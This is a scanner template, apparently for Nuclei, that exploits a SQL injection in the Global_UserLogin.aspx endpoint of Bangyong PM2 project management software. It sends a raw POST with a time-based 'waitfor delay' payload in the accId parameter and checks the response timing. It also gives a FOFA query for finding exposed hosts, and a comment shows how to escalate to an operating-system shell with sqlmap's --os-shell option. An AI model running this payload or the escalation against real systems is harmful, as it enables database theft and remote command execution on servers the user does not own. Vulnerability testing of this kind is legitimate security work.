id: bangyong-pm2-global_userlogin-sqli-rce

info:
  name: bangyong-pm2-global_userlogin-sqli-rce
  author: yy
  severity: high
  description: 北京邦永科技有限公司作为中国领先的专业项目管理软件厂商,由 IDG 资本、美国Intel公司、摩根史坦利等国际着名风险投资机构于2002年共同投资组建，邦永科技PM2项目管理产品的Global_UserLogin.aspx接口对用户传入的参数未进行有效的过滤，直接拼接至SQL查询的语句中，导致SQL注入漏洞，攻击者可利用该漏洞获取数据库的敏感信息。
  tags:  bangyong,sqli,rce
  metadata:
    fofa-qeury: 'PM2项目管理系统BS版增强工具.zip'
    veified: true
    max-request: 1

http:
  - raw:
      - |              
        POST /Global/Global_UserLogin.aspx HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
        Host: 

        accId=lCUnZcAO';%20waitfor%20delay%20'0:0:6'%20--%20&loginCode=e&password=&type=
               
    matchers:     
      - type: dsl
        name: sqlserver
        dsl:
          - "status_code_1 == 200 && duration>=5 && duration<=9 && contains(body,'waitfor delay') && contains(header,'text/html')" 
          
#可联合查询rce: python sqlmap.py -r 1.txt --os-shell
#POST /Global/Global_UserLogin.aspx HTTP/1.1
#Content-Type: application/x-www-form-urlencoded
#User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
#Host: 
#Content-Length: 80
#
#accId=1*&loginCode=e&password=&type=